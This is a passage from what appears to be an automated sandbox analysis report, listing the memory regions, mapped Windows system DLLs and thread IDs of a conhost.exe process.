monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10269 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10270 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 10271 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 10272 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10273 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10274 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10275 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 10276 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10277 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 10278 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10279 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10280 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10281 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10282 start_va = 0x4c0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 10287 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10288 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10289 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 10290 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10291 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10292 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 10293 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10294 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10295 start_va = 0xa0000 end_va = 0xa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10296 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10297 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10298 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10299 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10300 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10305 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10306 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 10307 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 10308 start_va = 0x5f0000 end_va = 0x777fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 10309 start_va = 0x780000 end_va = 0x900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 10310 start_va = 0x910000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 10311 start_va = 0x1d10000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 10312 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 10317 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10318 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 10319 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 10320 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10321 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10322 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 10323 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 10324 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10325 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10326 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 10327 start_va = 0x1d10000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 10328 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 10331 start_va = 0x1ed0000 end_va = 0x2206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10332 start_va = 0x1d10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 10333 start_va = 0x1e70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 10334 start_va = 0x2210000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 10338 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 10339 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10340 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10341 start_va = 0x2410000 end_va = 0x24cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 10342 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10343 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 10344 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 10345 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 10346 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10347 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10348 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 10349 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 10350 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 10351 start_va = 0x570000 end_va = 0x574fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 10352 start_va = 0x580000 end_va = 0x580fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 10353 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 10354 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 10355 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 10356 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Thread: id = 254 os_tid = 0x10d0 Thread: id = 255 os_tid = 0x1104 Thread: id = 256 os_tid = 0xd58 Thread: id = 257 os_tid = 0x1108